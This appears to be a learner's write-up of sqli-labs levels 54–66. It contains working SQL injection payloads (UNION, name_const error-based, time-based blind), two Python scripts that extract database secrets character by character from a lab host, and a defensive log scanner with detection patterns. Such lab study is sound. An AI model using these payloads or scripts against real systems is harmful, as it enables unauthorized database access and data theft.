Less-54:

?id=-1' union select 1,2,group_concat(table_name) from information_schema.tables where table_schema=database()--+

  • Your Password:CL0FY8NWDK

?id=-1' union select 1,database(),group_concat(column_name) from information_schema.columns where table_schema=database()  and table_name='CL0FY8NWDK'--+

  • Your Login name:challenges
  • Your Password:id,sessid,secret_TOM0,tryy

?id=-1' union select 1,group_concat(sessid),group_concat(secret_TOM0) from CL0FY8NWDK--+

  • Your Login name:d8074a35855a7f4935e3e19222d9a9eb
  • Your Password:bgAkTAN2t9AwqzSZyXtjhag4

A bit lost, I don't know how this one is meant to be played; in any case the login failed, I tried both sessid and secret_TOM0 Orz;

OK, I just hadn't looked at the page; what it says means "Congratulations, you succeeded". (By the way, weren't you blue before!!!)


Less-55:

?id=1) and (1 ,?id=1) and (0

  • Different responses, so the closure is a parenthesis

?id=0) union select 1,group_concat(table_name),database() from information_schema.tables where table_schema=database()--+

  • Your Login name:MYGNMGLTYN
  • Your Password:challenges

?id=0) union select 1,group_concat(column_name),database() from information_schema.columns where table_schema=database() and table_name='MYGNMGLTYN'--+

  • Your Login name:id,sessid,secret_81NP,tryy
  • Your Password:challenges
?id=0) union select 1,group_concat(secret_81NP),database() from MYGNMGLTYN--+

  • Your Login name:56aKKaL0ZO1elWAFGWwRtGcE
  • Your Password:challenges

Found:

  • 56aKKaL0ZO1elWAFGWwRtGcE

Less-56:

?id=1' and '0,?id=1' and '1

  • Different responses, single quote

?id=2' and '1

  • Returns the first record, so the closure includes a parenthesis

?id=0') union select 1,group_concat(table_name),3 from information_schema.tables where table_schema=database()--+

  • Your Login name:MYGNMGLTYN
  • Your Password:3

?id=0') union select 1,group_concat(column_name),3 from information_schema.columns where table_schema=database() and table_name='MYGNMGLTYN'--+

?id=0') union select 1,group_concat(secret_81NP),3 from MYGNMGLTYN--+

  • Your Login name:56aKKaL0ZO1elWAFGWwRtGcE
  • Your Password:3

Found:

  • 56aKKaL0ZO1elWAFGWwRtGcE


Less-57:

?id=1" and "0,?id=1" and "1

  • Double-quote closure

?id=2" and "1

  • Returns the second record, no parenthesis

?id=0" union select 1,2,group_concat(table_name) from information_schema.tables where table_schema=database()--+

  • Your Login name:2
  • Your Password:KXPI7R3J3M

?id=0" union select 1,2,group_concat(column_name) from information_schema.columns where table_schema=database()--+

  • Your Login name:2
  • Your Password:id,sessid,secret_24A7,tryy

?id=0" union select 1,2,group_concat(secret_24A7) from KXPI7R3J3M--+

  • Your Login name:2
  • Your Password:TNxWAHFGN4l1FiZOpr3F6yju

Found:

  • TNxWAHFGN4l1FiZOpr3F6yju

Less-58:

?id=1' and '1 ,?id=1' and '0

  • Single-quote closure

?id=2') and ('1

  • Error, so no parenthesis

?id=' union (SELECT * FROM (SELECT name_const((select group_concat(table_name) from information_schema.tables where table_schema=database()),1),name_const((select group_concat(table_name) from information_schema.tables where table_schema=database()),1)) a)--+

  • Duplicate column name 'ZQ803A690O'

?id=' union (SELECT * FROM (SELECT name_const((select group_concat(column_name) from information_schema.columns where table_schema=database()),1),name_const((select group_concat(column_name) from information_schema.columns where table_schema=database()),1)) a)--+

  • Duplicate column name 'id,sessid,secret_TB31,tryy'

?id=' union (SELECT * FROM (SELECT name_const((select group_concat(secret_TB31) from ZQ803A690O),1),name_const((select group_concat(secret_TB31) from ZQ803A690O),1)) a)--+

  • Duplicate column name '9f7VYPJeYRbMCqZ7mGZkzOlu'

Submit:

  • 9f7VYPJeYRbMCqZ7mGZkzOlu

Less-59:

?id=1 and 1,?id=1 and 0

  • Numeric type

?id=2 and 1

  • Returns the second record, no parenthesis

?id=0 union (SELECT * FROM (SELECT name_const((select group_concat(table_name) from information_schema.tables where table_schema=database()),1),name_const((select group_concat(table_name) from information_schema.tables where table_schema=database()),1)) a)--+

  • Duplicate column name 'DDCETXN5RL'

?id=0 union (SELECT * FROM (SELECT name_const((select group_concat(column_name) from information_schema.columns where table_schema=database()),1),name_const((select group_concat(column_name) from information_schema.columns where table_schema=database()),1)) a)--+

  • Duplicate column name 'id,sessid,secret_NW54,tryy'

?id=0 union (SELECT * FROM (SELECT name_const((select group_concat(secret_NW54) from DDCETXN5RL),1),name_const((select group_concat(secret_NW54) from DDCETXN5RL),1)) a)--+

  • Duplicate column name '1yChO5jTqiN4t1HpROwWWTBt'

Submit:

  • 1yChO5jTqiN4t1HpROwWWTBt

Less-60:

?id=2" and "0--+ ,?id=2" and "1--+

  • Double-quote closure; returns the first record, no parenthesis

?id=-1")union (SELECT * FROM (SELECT name_const((select group_concat(table_name) from information_schema.tables where table_schema=database()),1),name_const((select group_concat(table_name) from information_schema.tables where table_schema=database()),1)) a)--+

  • Duplicate column name 'HKTX3I9V9F'

?id=-1")union (SELECT * FROM (SELECT name_const((select group_concat(column_name) from information_schema.columns where table_schema=database()),1),name_const((select group_concat(column_name) from information_schema.columns where table_schema=database()),1)) a)--+

  • Duplicate column name 'id,sessid,secret_39ZN,tryy'

?id=-1")union (SELECT * FROM (SELECT name_const((select group_concat(secret_39ZN) from HKTX3I9V9F),1),name_const((select group_concat(secret_39ZN) from HKTX3I9V9F),1)) a)--+

  • Duplicate column name 'JGw1EIsBhUycAxCTGOmn3b23'

Submit:

  • JGw1EIsBhUycAxCTGOmn3b23

Less-61: there are two parentheses Orz

?id=1' and '0,?id=1' and '1

  • Single-quote closure

?id=2' and '1

  • Parenthesis closure

?id=-1'))union (SELECT * FROM (SELECT name_const((select group_concat(table_name) from information_schema.tables where table_schema=database()),1),name_const((select group_concat(table_name) from information_schema.tables where table_schema=database()),1)) a)--+

  • Duplicate column name 'P1EYFNKQS3'


Less-62:

?id=1' and '0,?id=1' and '1

  • Single-quote closure

?id=2' and '1

  • Parenthesis closure

?id=2' and sleep(3) and '1--+

  • Detected: time-based blind injection is usable
'''
@Modify Time @Author
------------ -------
2019/10/10 13:03 laoalo
'''
# -*- coding:utf-8 -*-
import requests
import time

# Less-62 closes the injection point with  ')  ; every payload below is appended to this prefix.
# The trailing " +--+" reaches the server as " -- " and comments out the rest of the query.
url = "http://192.168.199.190/sqli-labs-master/Less-62/?id=1') "


def database_length():
    # The guess i is right the first time length(database()) > i is false,
    # because only then does the server execute sleep(3).
    for i in range(1, 10000):
        sql = url + " and if((length(database()))>" + str(i) + ",0,sleep(3)) +--+"
        s_time = time.time()
        requests.get(url=sql)
        e_time = time.time()
        print(sql)
        if (e_time - s_time) > 3:
            print("数据库长:", i)
            break


def database_name(database_length):
    # Recover the name one character at a time; only lowercase letters are tried here.
    sql = url + " and if(ascii(substr((select database()),{num},1))>{asc},0,sleep(3)) +--+"
    db_name = ''
    for num in range(1, database_length + 1):
        for asc in range(ord('a'), ord('z') + 1):
            s_time = time.time()
            requests.get(sql.format(num=num, asc=asc))
            e_time = time.time()
            if (e_time - s_time) > 3:
                db_name += chr(asc)
                print("数据库名:", db_name)
                break


def table_length(database_name):
    # Length of the comma-joined list of table names in the given schema
    for i in range(1, 10000):
        sql = url + " and if((select length((select group_concat(table_name) from information_schema.tables where table_schema='" + database_name + "')))>" + str(i) + ",0,sleep(3)) +--+"
        s_time = time.time()
        requests.get(url=sql)
        e_time = time.time()
        print(sql)
        if (e_time - s_time) > 3:
            print(database_name, "中的所有数据表名长:", i)
            break


def table_name(table_length, database_name):
    # Table names joined with '@'; every printable ASCII code (32..127) is tried per position
    sql = url + " and if(ascii(substr((select group_concat(table_name separator '@') from information_schema.tables where table_schema='" + database_name + "'),{num},1))>{asc},0,sleep(3)) +--+"
    names = ''
    for num in range(1, table_length + 1):
        for asc in range(32, 128):
            s_time = time.time()
            requests.get(sql.format(num=num, asc=asc))
            e_time = time.time()
            if (e_time - s_time) > 3:
                names += chr(asc)
                print("所有的数据表名:", names)
                break


def column_length(table_name, database_name):
    # Length of the comma-joined list of column names of one table
    for i in range(1, 10000):
        sql = url + " and if((select length((select group_concat(column_name) from information_schema.columns where table_name='" + table_name + "' and table_schema='" + database_name + "')))>" + str(i) + ",0,sleep(3)) +--+"
        s_time = time.time()
        requests.get(url=sql)
        e_time = time.time()
        # print(sql)
        if (e_time - s_time) > 3:
            print(table_name, "中的所有字段名长:", i)
            break


def column_name(column_length, table_name, database_name):
    # Column names joined with '@' (the original reused the name table_name for this accumulator)
    sql = url + " and if(ascii(substr((select group_concat(column_name separator '@') from information_schema.columns where table_name='" + table_name + "' and table_schema='" + database_name + "'),{num},1))>{asc},0,sleep(3)) +--+"
    names = ''
    for num in range(1, column_length + 1):
        for asc in range(32, 128):
            s_time = time.time()
            requests.get(sql.format(num=num, asc=asc))
            e_time = time.time()
            if (e_time - s_time) > 3:
                names += chr(asc)
                print("所有的字段名:", names)
                break


def data_length(column_name, table_name):
    # Length of all values of one column joined with '@'
    for i in range(1, 10000):
        sql = url + " and if((select length((select group_concat(" + column_name + " separator '@') from " + table_name + ")))>" + str(i) + ",0,sleep(3)) +--+"
        s_time = time.time()
        requests.get(url=sql)
        e_time = time.time()
        # print(sql)
        if (e_time - s_time) > 3:
            print(column_name, "字段的值长:", i)
            break


def data_detail(data_length, column_name, table_name):
    # Recover the joined column values character by character
    sql = url + " and if(ascii(substr((select group_concat(" + column_name + " separator '@') from " + table_name + "),{num},1))>{asc},0,sleep(3)) +--+"
    data = ''
    for num in range(1, data_length + 1):
        for asc in range(32, 128):
            s_time = time.time()
            requests.get(sql.format(num=num, asc=asc))
            e_time = time.time()
            if (e_time - s_time) > 3:
                data += chr(asc)
                print(column_name, "字段的值:", data)
                break


if __name__ == '__main__':
    # Each step's result (recorded in the comments) is fed into the next one.
    # database_length()                             # database length: 10
    # database_name(10)                             # database name: challenges
    # table_length('challenges')                    # total length of table names in challenges: 10
    # table_name(10, 'challenges')                  # all table names: P1EYFNKQS3
    # column_length('P1EYFNKQS3', 'challenges')     # total length of column names in P1EYFNKQS3: 26
    # column_name(26, 'P1EYFNKQS3', 'challenges')   # all column names: id@sessid@secret_ZGLB@tryy
    # data_length('secret_ZGLB', 'P1EYFNKQS3')      # length of the secret_ZGLB value: 24
    data_detail(24, 'secret_ZGLB', 'P1EYFNKQS3')    # secret_ZGLB value: o6x95TdsyX3fTTBuJcgRIpoa


Less-63:

?id=1' and '0,?id=1' and '1

  • Single-quote closure

?id=1' and sleep(1) --+

  • Detected: time-based blind injection is usable

Reuse the script from 62; only this line needs to change:

 url = "http://192.168.199.190/sqli-labs-master/Less-63/?id=1' "


Less-64:

?id=1 and 0,?id=1 and 0

  • Numeric type

?id=2 and 1

  • Returns the first record, parenthesis

?id=(1 and if((length(database())=10),sleep(1),1))

  • select * from users where id=(1 and if((length(database())=8),sleep(1),1));  time-based blind injection
'''
@Modify Time @Author
------------ -------
2019/10/11 20:15 laoalo
'''
# -*- coding:utf-8 -*-
import requests
import time

# Less-64 is numeric with a parenthesis, so no quote or comment is needed; payloads are appended here.
# The payloads use sleep(1) while the checks keep the original 3-second threshold: in a WHERE clause
# sleep() is typically evaluated once per scanned row, so the total delay is still far above 3 s.
url = "http://192.168.199.190/sqli-labs-master/Less-64/?id=1 "


def database_length():
    # The guess i is right the first time length(database()) > i is false, which triggers sleep()
    for i in range(1, 10000):
        sql = url + " and if((length(database()))>" + str(i) + ",0,sleep(1))"
        s_time = time.time()
        requests.get(url=sql)
        e_time = time.time()
        print(sql)
        if (e_time - s_time) > 3:
            print("数据库长:", i)
            break


def database_name(database_length):
    # Recover the name one character at a time; only lowercase letters are tried here.
    sql = url + " and if(ascii(substr((select database()),{num},1))>{asc},0,sleep(1)) "
    db_name = ''
    for num in range(1, database_length + 1):
        for asc in range(ord('a'), ord('z') + 1):
            s_time = time.time()
            requests.get(sql.format(num=num, asc=asc))
            e_time = time.time()
            if (e_time - s_time) > 3:
                db_name += chr(asc)
                print("数据库名:", db_name)
                break


def table_length(database_name):
    # Length of the comma-joined list of table names in the given schema
    for i in range(1, 10000):
        sql = url + " and if((select length((select group_concat(table_name) from information_schema.tables where table_schema='" + database_name + "')))>" + str(i) + ",0,sleep(1)) "
        s_time = time.time()
        requests.get(url=sql)
        e_time = time.time()
        print(sql)
        if (e_time - s_time) > 3:
            print(database_name, "中的所有数据表名长:", i)
            break


def table_name(table_length, database_name):
    # Table names joined with '@'; every printable ASCII code (32..127) is tried per position
    sql = url + " and if(ascii(substr((select group_concat(table_name separator '@') from information_schema.tables where table_schema='" + database_name + "'),{num},1))>{asc},0,sleep(1))"
    names = ''
    for num in range(1, table_length + 1):
        for asc in range(32, 128):
            s_time = time.time()
            requests.get(sql.format(num=num, asc=asc))
            e_time = time.time()
            if (e_time - s_time) > 3:
                names += chr(asc)
                print("所有的数据表名:", names)
                break


def column_length(table_name, database_name):
    # Length of the comma-joined list of column names of one table
    for i in range(1, 10000):
        sql = url + " and if((select length((select group_concat(column_name) from information_schema.columns where table_name='" + table_name + "' and table_schema='" + database_name + "')))>" + str(i) + ",0,sleep(1))"
        s_time = time.time()
        requests.get(url=sql)
        e_time = time.time()
        # print(sql)
        if (e_time - s_time) > 3:
            print(table_name, "中的所有字段名长:", i)
            break


def column_name(column_length, table_name, database_name):
    # Column names joined with '@' (the original reused the name table_name for this accumulator)
    sql = url + " and if(ascii(substr((select group_concat(column_name separator '@') from information_schema.columns where table_name='" + table_name + "' and table_schema='" + database_name + "'),{num},1))>{asc},0,sleep(1))"
    names = ''
    for num in range(1, column_length + 1):
        for asc in range(32, 128):
            s_time = time.time()
            requests.get(sql.format(num=num, asc=asc))
            e_time = time.time()
            if (e_time - s_time) > 3:
                names += chr(asc)
                print("所有的字段名:", names)
                break


def data_length(column_name, table_name):
    # Length of all values of one column joined with '@'
    for i in range(1, 10000):
        sql = url + " and if((select length((select group_concat(" + column_name + " separator '@') from " + table_name + ")))>" + str(i) + ",0,sleep(1))"
        s_time = time.time()
        requests.get(url=sql)
        e_time = time.time()
        # print(sql)
        if (e_time - s_time) > 3:
            print(column_name, "字段的值长:", i)
            break


def data_detail(data_length, column_name, table_name):
    # Recover the joined column values character by character
    sql = url + " and if(ascii(substr((select group_concat(" + column_name + " separator '@') from " + table_name + "),{num},1))>{asc},0,sleep(1))"
    data = ''
    for num in range(1, data_length + 1):
        for asc in range(32, 128):
            s_time = time.time()
            requests.get(sql.format(num=num, asc=asc))
            e_time = time.time()
            if (e_time - s_time) > 3:
                data += chr(asc)
                print(column_name, "字段的值:", data)
                break


if __name__ == '__main__':
    # Each step's result (recorded in the comments) is fed into the next one.
    # database_length()                             # database length: 10
    # database_name(10)                             # database name: challenges
    # table_length('challenges')                    # total length of table names in challenges: 10
    # table_name(10, 'challenges')                  # all table names: DMQZ801XDN
    # column_length('DMQZ801XDN', 'challenges')     # total length of column names in P1EYFNKQS3: 26
    # column_name(26, 'DMQZ801XDN', 'challenges')   # all column names: id@sessid@secret_PBSY@……
    # data_length('secret_PBSY', 'DMQZ801XDN')      # length of the secret_PBSY value: 24
    data_detail(24, 'secret_PBSY', 'DMQZ801XDN')    # secret_PBSY value: gSNmoKm4ctz4y……


Less-65:

?id=1" and "0,?id=1" and "0

  • Double-quote closure

?id=2" and "1

  • Returns the first record, parenthesis closure

?id=2" and 1 and 1))--+,?id=2" and 1 and 0))--+ ==> select * from users where id=(("2" and 1 and 0))--+"));

  • No output, so it is not a double parenthesis

?id=2" and if((length(database())=10),sleep(1),1))--+

  • Time-based blind injection
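The defender's view of Less-54 through Less-65, as an added example that is not part of the original writeup: a small access-log scanner that flags the three techniques used above (UNION dumps of information_schema, name_const() duplicate-column errors, and sleep() delays) and, for the time-based payloads of Less-62 to 65, checks whether the response time actually confirms that the sleep() executed. The log format, IP addresses and request lines are constructed for this example.

```python
import re
from urllib.parse import parse_qs, unquote_plus, urlparse

# Constructed sample lines in a hypothetical "ip method path status seconds" format;
# none of these come from a real server.
SAMPLE_LOG = """\
10.0.0.5 GET /sqli-labs-master/Less-62/?id=1 200 0.012
10.0.0.5 GET /sqli-labs-master/Less-62/?id=1')+and+if((length(database()))>9,0,sleep(3))+--+ 200 3.041
10.0.0.7 GET /sqli-labs-master/Less-59/?id=0+union+(SELECT+*+FROM+(SELECT+name_const((select+group_concat(table_name)+from+information_schema.tables),1),name_const(1,1))+a)--+ 200 0.020
10.0.0.9 GET /sqli-labs-master/Less-54/?id=-1'+union+select+1,2,group_concat(table_name)+from+information_schema.tables+where+table_schema=database()--+ 200 0.015
10.0.0.3 GET /sqli-labs-master/Less-54/?id=2 200 0.010
"""

# Signatures for the three techniques used across Less-54..65.
RULES = {
    "union_schema_dump": re.compile(r"\bunion\b[\s(]*(all\s+)?select\b.*\binformation_schema\b", re.I | re.S),
    "name_const_error": re.compile(r"\bname_const\s*\(", re.I),
    "time_based_sleep": re.compile(r"\bsleep\s*\(\s*\d+(\.\d+)?\s*\)", re.I),
}
SLOW_SECONDS = 2.0  # a response slower than this corroborates a sleep() payload


def classify_request(path, seconds):
    """Return the set of rule names matched by any query parameter of one request."""
    tags = set()
    for values in parse_qs(urlparse(path).query, keep_blank_values=True).values():
        for value in values:
            decoded = unquote_plus(value)  # strip one extra layer of URL encoding, if any
            tags.update(name for name, rx in RULES.items() if rx.search(decoded))
    # A sleep() in the input is only a suspicion; a matching delay shows the SQL really ran.
    if "time_based_sleep" in tags and seconds >= SLOW_SECONDS:
        tags.add("delay_observed")
    return tags


def scan_log(text):
    """Return (client_ip, path, sorted tags) for every line that matched at least one rule."""
    findings = []
    for line in text.splitlines():
        ip, _method, path, _status, seconds = line.split()
        tags = classify_request(path, float(seconds))
        if tags:
            findings.append((ip, path, sorted(tags)))
    return findings


if __name__ == "__main__":
    for ip, path, tags in scan_log(SAMPLE_LOG):
        print(ip, ",".join(tags), path[:60])
```

The "delay_observed" tag is the one worth alerting on first: it separates a probe that was merely attempted from one that the database executed.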


Less-66:

Skipping this one for now; I don't know why it is broken on my setup

I checked my lab environment, emmm OK, the sqli-labs series ends early Orz
